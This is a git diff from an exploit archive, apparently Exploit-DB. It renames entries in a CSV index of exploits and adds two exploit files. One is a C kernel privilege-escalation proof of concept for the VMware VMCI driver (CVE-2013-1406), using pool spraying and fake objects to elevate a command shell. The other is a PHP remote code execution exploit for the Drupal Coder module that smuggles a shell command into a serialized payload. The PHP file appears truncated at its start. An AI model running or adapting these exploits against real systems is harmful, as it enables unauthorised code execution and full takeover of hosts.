diff --git a/files.csv b/files.csv index e34d6f354..8b36d3fd7 100755 --- a/files.csv +++ b/files.csv @@ -21617,7 +21617,7 @@ id,file,description,date,author,platform,type,port 24441,platforms/hardware/webapps/24441.txt,"Netgear SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0 24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals (gallery.php L param) - SQL Injection",2013-02-17,3spi0n,php,webapps,0 24433,platforms/php/webapps/24433.txt,"php weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps,0 -24460,platforms/windows/remote/24460.rb,"VMWare OVF Tools - Format String (1)",2013-02-06,Metasploit,windows,remote,0 +24460,platforms/windows/remote/24460.rb,"VMware OVF Tools - Format String (1)",2013-02-06,Metasploit,windows,remote,0 24434,platforms/multiple/remote/24434.rb,"Ruby on Rails JSON Processor YAML Deserialization Code Execution",2013-01-29,Metasploit,multiple,remote,0 24435,platforms/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE - Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,hardware,webapps,0 24436,platforms/php/webapps/24436.txt,"Kohana Framework 2.3.3 - Directory Traversal",2013-01-29,Vulnerability-Lab,php,webapps,0 @@ -21640,7 +21640,7 @@ id,file,description,date,author,platform,type,port 24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,php,webapps,0 24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Local Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0 24459,platforms/linux/local/24459.sh,"Linux Kernel 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,local,0 -24461,platforms/windows/remote/24461.rb,"VMWare OVF Tools - Format String (2)",2013-02-12,Metasploit,windows,remote,0 +24461,platforms/windows/remote/24461.rb,"VMware OVF Tools - Format String (2)",2013-02-12,Metasploit,windows,remote,0 24462,platforms/php/webapps/24462.txt,"Hiverr 2.2 - Multiple Vulnerabilities",2013-02-06,xStarCode,php,webapps,0 24463,platforms/windows/dos/24463.txt,"Cool PDF Reader 3.0.2.256 - Buffer Overflow",2013-02-07,"Chris Gabriel",windows,dos,0 24464,platforms/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0 @@ -25037,7 +25037,7 @@ id,file,description,date,author,platform,type,port 27996,platforms/php/webapps/27996.txt,"Open Business Management 1.0.3 pl1 user_index.php tf_lastname Parameter XSS",2006-06-07,r0t,php,webapps,0 27997,platforms/php/webapps/27997.txt,"Open Business Management 1.0.3 pl1 list_index.php Multiple Parameter XSS",2006-06-07,r0t,php,webapps,0 28394,platforms/php/webapps/28394.pl,"FusionPHP Fusion News 3.7 Index.php Remote File Inclusion",2006-08-16,O.U.T.L.A.W,php,webapps,0 -27938,platforms/linux/local/27938.rb,"VMWare - Setuid vmware-mount Unsafe popen(3)",2013-08-29,Metasploit,linux,local,0 +27938,platforms/linux/local/27938.rb,"VMware - Setuid vmware-mount Unsafe popen(3)",2013-08-29,Metasploit,linux,local,0 27939,platforms/windows/remote/27939.rb,"HP LoadRunner - lrFileIOService ActiveX Remote Code Execution",2013-08-29,Metasploit,windows,remote,0 27940,platforms/windows/remote/27940.rb,"Firefox XMLSerializer Use After Free",2013-08-29,Metasploit,windows,remote,0 27941,platforms/php/remote/27941.rb,"SPIP connect Parameter PHP Injection",2013-08-29,Metasploit,php,remote,0 @@ -36305,6 +36305,7 @@ id,file,description,date,author,platform,type,port 40140,platforms/php/webapps/40140.txt,"TeamPass Passwords Management System 2.1.26 - Arbitrary File Download",2016-07-21,"Hasan Emre Ozer",php,webapps,80 40141,platforms/bsd/local/40141.c,"mail.local(8) (NetBSD) - Local Root Exploit (NetBSD-SA2016-006)",2016-07-21,akat1,bsd,local,0 40142,platforms/php/remote/40142.php,"Apache 2.4.7 + PHP 7.0.2 - openssl_seal() Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0 +40144,platforms/php/remote/40144.php,"Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution Exploit (SA-CONTRIB-2016-039)",2016-07-23,Raz0r,php,remote,0 40146,platforms/linux/remote/40146.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000 40147,platforms/linux/remote/40147.rb,"Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000 40148,platforms/windows/local/40148.py,"MediaCoder 0.8.43.5852 - .m3u SEH Exploit",2016-07-25,"Karn Ganeshen",windows,local,0 @@ -36322,10 +36323,11 @@ id,file,description,date,author,platform,type,port 40161,platforms/java/webapps/40161.txt,"Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities",2016-07-25,"SEC Consult",java,webapps,9443 40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post Auth Remote Root Exploit (Metasploit)",2016-07-26,xort,linux,remote,8000 40163,platforms/php/webapps/40163.txt,"PHP File Vault 0.9 - Directory Traversal",2016-07-26,N_A,php,webapps,80 +40164,platforms/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) vmci.sys - Proof of Concept",2013-03-06,"Artem Shishkin",multiple,local,0 40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80 40166,platforms/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Root Command Execution",2016-07-26,LiquidWorm,cgi,webapps,80 40167,platforms/linux/remote/40167.txt,"Iris ID IrisAccess iCAM4000/iCAM7000 - Hardcoded Credentials Remote Shell Access",2016-07-26,LiquidWorm,linux,remote,23 -40169,platforms/linux/local/40169.txt,"VMWare - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)",2013-08-22,"Tavis Ormandy",linux,local,0 +40169,platforms/linux/local/40169.txt,"VMware - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)",2013-08-22,"Tavis Ormandy",linux,local,0 40170,platforms/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,python,remote,80 40172,platforms/windows/local/40172.py,"VUPlayer 2.49 - (.pls) Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local,0 40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Local Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0 @@ -36349,7 +36351,7 @@ id,file,description,date,author,platform,type,port 40198,platforms/multiple/dos/40198.txt,"Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - WSP Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0 40199,platforms/multiple/dos/40199.txt,"Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - RLC Dissector Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos,0 40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices and NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0 -40201,platforms/linux/remote/40201.txt,"ntop 2.3 <= 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0 +40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 <= 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0 40202,platforms/php/webapps/40202.txt,"Subrion CMS 4.0.5 - SQL Injection",2016-08-05,Vulnerability-Lab,php,webapps,80 40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - (Connection Name) Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0 40204,platforms/php/webapps/40204.txt,"PHP Power Browse 1.2 - Directory Traversal",2016-08-05,"Manuel Mancera",php,webapps,80 @@ -36361,6 +36363,6 @@ id,file,description,date,author,platform,type,port 40210,platforms/php/webapps/40210.html,"NUUO NVRmini 2 3.0.8 - (Add Admin) CSRF",2016-08-06,LiquidWorm,php,webapps,80 40211,platforms/php/webapps/40211.txt,"NUUO NVRmini 2 3.0.8 - Local File Disclosure",2016-08-06,LiquidWorm,php,webapps,80 40212,platforms/php/webapps/40212.txt,"NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection",2016-08-06,LiquidWorm,php,webapps,80 -40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - ShellShock Remote Code Execution",2016-08-06,LiquidWorm,cgi,webapps,80 +40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - (ShellShock) Remote Code Execution",2016-08-06,LiquidWorm,cgi,webapps,80 40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80 40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80 diff --git a/platforms/multiple/local/40164.c b/platforms/multiple/local/40164.c new file mode 100755 index 000000000..7eeccee41 --- /dev/null +++ b/platforms/multiple/local/40164.c @@ -0,0 +1,472 @@ +/* + CVE-2013-1406 exploitation PoC + by Artem Shishkin, + Positive Research, + Positive Technologies, + 02-2013 +*/ + +void __stdcall FireShell(DWORD dwSomeParam) +{ + EscalatePrivileges(hProcessToElevate); + // Equate the stack and quit the cycle +#ifndef _AMD64_ + __asm + { + pop ebx + pop edi + push 0xFFFFFFF8 + push 0xA010043 + } +#endif +} + + +HANDLE LookupObjectHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, PVOID pObjectAddr, DWORD dwProcessID = 0) +{ + HANDLE hResult = 0; + DWORD dwLookupProcessID = dwProcessID; + + if (pHandleTable == NULL) + { + printf("Ain't funny\n"); + return 0; + } + + if (dwLookupProcessID == 0) + { + dwLookupProcessID = GetCurrentProcessId(); + } + + for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) + { + if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].Object == pObjectAddr)) + { + hResult = pHandleTable->Handles[i].HandleValue; + break; + } + } + + return hResult; +} + +PVOID LookupObjectAddress(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0) +{ + PVOID pResult = 0; + DWORD dwLookupProcessID = dwProcessID; + + if (pHandleTable == NULL) + { + printf("Ain't funny\n"); + return 0; + } + + if (dwLookupProcessID == 0) + { + dwLookupProcessID = GetCurrentProcessId(); + } + + for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) + { + if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject)) + { + pResult = (HANDLE)pHandleTable->Handles[i].Object; + break; + } + } + + return pResult; +} + +void CloseTableHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0) +{ + DWORD dwLookupProcessID = dwProcessID; + + if (pHandleTable == NULL) + { + printf("Ain't funny\n"); + return; + } + + if (dwLookupProcessID == 0) + { + dwLookupProcessID = GetCurrentProcessId(); + } + + for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++) + { + if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject)) + { + pHandleTable->Handles[i].Object = NULL; + pHandleTable->Handles[i].HandleValue = NULL; + break; + } + } + + return; +} + +void PoolSpray() +{ + // Init used native API function + lpNtQuerySystemInformation NtQuerySystemInformation = (lpNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation"); + if (NtQuerySystemInformation == NULL) + { + printf("Such a fail...\n"); + return; + } + + // Determine object size + // xp: + //const DWORD_PTR dwSemaphoreSize = 0x38; + // 7: + //const DWORD_PTR dwSemaphoreSize = 0x48; + + DWORD_PTR dwSemaphoreSize = 0; + + if (LOBYTE(GetVersion()) == 5) + { + dwSemaphoreSize = 0x38; + } + else if (LOBYTE(GetVersion()) == 6) + { + dwSemaphoreSize = 0x48; + } + + unsigned int cycleCount = 0; + while (cycleCount < 50000) + { + HANDLE hTemp = CreateSemaphore(NULL, 0, 3, NULL); + if (hTemp == NULL) + { + break; + } + + ++cycleCount; + } + + printf("\t[+] Spawned lots of semaphores\n"); + + printf("\t[.] Initing pool windows\n"); + Sleep(2000); + + DWORD dwNeeded = 4096; + NTSTATUS status = 0xFFFFFFFF; + PVOID pBuf = VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READWRITE); + + while (true) + { + status = NtQuerySystemInformation(SystemExtendedHandleInformation, pBuf, dwNeeded, NULL); + if (status != STATUS_SUCCESS) + { + dwNeeded *= 2; + VirtualFree(pBuf, 0, MEM_RELEASE); + pBuf = VirtualAlloc(NULL, dwNeeded, MEM_COMMIT, PAGE_READWRITE); + } + else + { + break; + } + }; + + HANDLE hHandlesToClose[0x30] = {0}; + DWORD dwCurPID = GetCurrentProcessId(); + PSYSTEM_HANDLE_INFORMATION_EX pHandleTable = (PSYSTEM_HANDLE_INFORMATION_EX)pBuf; + + for (ULONG i = 0; i < pHandleTable->NumberOfHandles; i++) + { + if (pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwCurPID) + { + DWORD_PTR dwTestObjAddr = (DWORD_PTR)pHandleTable->Handles[i].Object; + DWORD_PTR dwTestHandleVal = (DWORD_PTR)pHandleTable->Handles[i].HandleValue; + DWORD_PTR dwWindowAddress = 0; + bool bPoolWindowFound = false; + + UINT iObjectsNeeded = 0; + // Needed window size is vmci packet pool chunk size (0x218) divided by + // Semaphore pool chunk size (dwSemaphoreSize) + iObjectsNeeded = (0x218 / dwSemaphoreSize) + ((0x218 % dwSemaphoreSize != 0) ? 1 : 0); + + if ( + // Not on a page boundary + ((dwTestObjAddr & 0xFFF) != 0) + && + // Doesn't cross page boundary + (((dwTestObjAddr + 0x300) & 0xF000) == (dwTestObjAddr & 0xF000)) + ) + { + // Check previous object for being our semaphore + DWORD_PTR dwPrevObject = dwTestObjAddr - dwSemaphoreSize; + if (LookupObjectHandle(pHandleTable, (PVOID)dwPrevObject) == NULL) + { + continue; + } + + for (unsigned int j = 1; j < iObjectsNeeded; j++) + { + DWORD_PTR dwNextTestAddr = dwTestObjAddr + (j * dwSemaphoreSize); + HANDLE hLookedUp = LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr); + + //printf("dwTestObjPtr = %08X, dwTestObjHandle = %08X\n", dwTestObjAddr, dwTestHandleVal); + //printf("\tdwTestNeighbour = %08X\n", dwNextTestAddr); + //printf("\tLooked up handle = %08X\n", hLookedUp); + + if (hLookedUp != NULL) + { + hHandlesToClose[j] = hLookedUp; + + if (j == iObjectsNeeded - 1) + { + // Now test the following object + dwNextTestAddr = dwTestObjAddr + ((j + 1) * dwSemaphoreSize); + if (LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr) != NULL) + { + hHandlesToClose[0] = (HANDLE)dwTestHandleVal; + bPoolWindowFound = true; + + dwWindowAddress = dwTestObjAddr; + + // Close handles to create a memory window + for (int k = 0; k < iObjectsNeeded; k++) + { + if (hHandlesToClose[k] != NULL) + { + CloseHandle(hHandlesToClose[k]); + CloseTableHandle(pHandleTable, hHandlesToClose[k]); + } + } + } + else + { + memset(hHandlesToClose, 0, sizeof(hHandlesToClose)); + break; + } + } + } + else + { + memset(hHandlesToClose, 0, sizeof(hHandlesToClose)); + break; + } + } + + if (bPoolWindowFound) + { + printf("\t[+] Window found at %08X!\n", dwWindowAddress); + } + + } + } + } + + VirtualFree(pBuf, 0, MEM_RELEASE); + + return; +} + +void InitFakeBuf(PVOID pBuf, DWORD dwSize) +{ + if (pBuf != NULL) + { + RtlFillMemory(pBuf, dwSize, 0x11); + } + + return; +} + +void PlaceFakeObjects(PVOID pBuf, DWORD dwSize, DWORD dwStep) +{ + /* + Previous chunk size will be always 0x43 and the pool index will be 0, so the last bytes will be 0x0043 + So, for every 0xXXXX0043 address we must suffice the following conditions: + + lea edx, [eax+38h] + lock xadd [edx], ecx + cmp ecx, 1 + + Some sort of lock at [addr + 38] must be equal to 1. And + + call dword ptr [eax+0ACh] + + The call site is located at [addr + 0xAC] + + Also fake the object to be dereferenced at [addr + 0x100] + */ + + if (pBuf != NULL) + { + for (PUCHAR iAddr = (PUCHAR)pBuf + 0x43; iAddr < (PUCHAR)pBuf + dwSize; iAddr = iAddr + dwStep) + { + PDWORD pLock = (PDWORD)(iAddr + 0x38); + PDWORD_PTR pCallMeMayBe = (PDWORD_PTR)(iAddr + 0xAC); + PDWORD_PTR pFakeDerefObj = (PDWORD_PTR)(iAddr + 0x100); + + *pLock = 1; + *pCallMeMayBe = (DWORD_PTR)FireShell; + *pFakeDerefObj = (DWORD_PTR)pBuf + 0x1000; + } + } + + return; +} + +void PenetrateVMCI() +{ + /* + + VMware Security Advisory + Advisory ID: VMSA-2013-0002 + Synopsis: VMware ESX, Workstation, Fusion, and View VMCI privilege escalation vulnerability + Issue date: 2013-02-07 + Updated on: 2013-02-07 (initial advisory) + CVE numbers: CVE-2013-1406 + + */ + + DWORD dwPidToElevate = 0; + HANDLE hSuspThread = NULL; + + bool bXP = (LOBYTE(GetVersion()) == 5); + bool b7 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 1)); + bool b8 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 2)); + + if (!InitKernelFuncs()) + { + printf("[-] Like I don't know where the shellcode functions are\n"); + return; + } + + if (bXP) + { + printf("[?] Who do we want to elevate?\n"); + scanf_s("%d", &dwPidToElevate); + + hProcessToElevate = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPidToElevate); + if (hProcessToElevate == NULL) + { + printf("[-] This process doesn't want to be elevated\n"); + return; + } + } + + if (b7 || b8) + { + // We are unable to change an active process token on-the-fly, + // so we create a custom shell suspended (Ionescu hack) + STARTUPINFO si = {0}; + PROCESS_INFORMATION pi = {0}; + + si.wShowWindow = TRUE; + + WCHAR cmdPath[MAX_PATH] = {0}; + GetSystemDirectory(cmdPath, MAX_PATH); + wcscat_s(cmdPath, MAX_PATH, L"\\cmd.exe"); + + if (CreateProcess(cmdPath, L"", NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi) == TRUE) + { + hProcessToElevate = pi.hProcess; + hSuspThread = pi.hThread; + } + } + + HANDLE hVMCIDevice = CreateFile(L"\\\\.\\vmci", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL); + if (hVMCIDevice != INVALID_HANDLE_VALUE) + { + UCHAR BadBuff[0x624] = {0}; + UCHAR retBuf[0x624] = {0}; + DWORD dwRet = 0; + + printf("[+] VMCI service found running\n"); + + PVM_REQUEST pVmReq = (PVM_REQUEST)BadBuff; + pVmReq->Header.RequestSize = 0xFFFFFFF0; + + PVOID pShellSprayBufStd = NULL; + PVOID pShellSprayBufQtd = NULL; + PVOID pShellSprayBufStd7 = NULL; + PVOID pShellSprayBufQtd7 = NULL; + PVOID pShellSprayBufChk8 = NULL; + + if ((b7) || (bXP) || (b8)) + { + /* + Significant bits of a PoolType of a chunk define the following regions: + 0x0A000000 - 0x0BFFFFFF - Standard chunk + 0x1A000000 - 0x1BFFFFFF - Quoted chunk + 0x0 - 0xFFFFFFFF - Free chunk - no idea + + Addon for Windows 7: + Since PoolType flags have changed, and "In use flag" is now 0x2, + define an additional region for Win7: + + 0x04000000 - 0x06000000 - Standard chunk + 0x14000000 - 0x16000000 - Quoted chunk + */ + + pShellSprayBufStd = VirtualAlloc((LPVOID)0xA000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + pShellSprayBufQtd = VirtualAlloc((LPVOID)0x1A000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + pShellSprayBufStd7 = VirtualAlloc((LPVOID)0x4000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + pShellSprayBufQtd7 = VirtualAlloc((LPVOID)0x14000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + + if ((pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL)) + { + printf("\t[-] Unable to map the needed memory regions, please try running the app again\n"); + CloseHandle(hVMCIDevice); + return; + } + + InitFakeBuf(pShellSprayBufStd, 0x2000000); + InitFakeBuf(pShellSprayBufQtd, 0x2000000); + InitFakeBuf(pShellSprayBufStd7, 0x2000000); + InitFakeBuf(pShellSprayBufQtd7, 0x2000000); + + PlaceFakeObjects(pShellSprayBufStd, 0x2000000, 0x10000); + PlaceFakeObjects(pShellSprayBufQtd, 0x2000000, 0x10000); + PlaceFakeObjects(pShellSprayBufStd7, 0x2000000, 0x10000); + PlaceFakeObjects(pShellSprayBufQtd7, 0x2000000, 0x10000); + + if (SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL) == FALSE) + { + SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST); + } + + PoolSpray(); + + if (DeviceIoControl(hVMCIDevice, 0x8103208C, BadBuff, sizeof(BadBuff), retBuf, sizeof(retBuf), &dwRet, NULL) == TRUE) + { + printf("\t[!] If you don't see any BSOD, you're successful\n"); + + if (b7 || b8) + { + ResumeThread(hSuspThread); + } + } + else + { + printf("[-] Not this time %d\n", GetLastError()); + } + + if (pShellSprayBufStd != NULL) + { + VirtualFree(pShellSprayBufStd, 0, MEM_RELEASE); + } + + if (pShellSprayBufQtd != NULL) + { + VirtualFree(pShellSprayBufQtd, 0, MEM_RELEASE); + } + } + + SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL); + + CloseHandle(hVMCIDevice); + } + else + { + printf("[-] Like I don't see vmware here\n"); + } + + CloseHandle(hProcessToElevate); + + return; +} \ No newline at end of file diff --git a/platforms/php/remote/40144.php b/platforms/php/remote/40144.php new file mode 100755 index 000000000..9c16df529 --- /dev/null +++ b/platforms/php/remote/40144.php @@ -0,0 +1,29 @@ + array( + "coder_upgrade" => array( + "module" => "color", + "files" => array("color.module") + ) + ), + "extensions" => array("module"), + "items" => array (array("old_dir"=>"test; $cmd;", "new_dir"=>"test")), + "paths" => array( + "modules_base" => "../../../", + "files_base" => "../../../../sites/default/files" + ) +); +$payload = serialize($a); +file_get_contents($host . "/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php?file=data://text/plain;base64," . base64_encode($payload)); + +?> \ No newline at end of file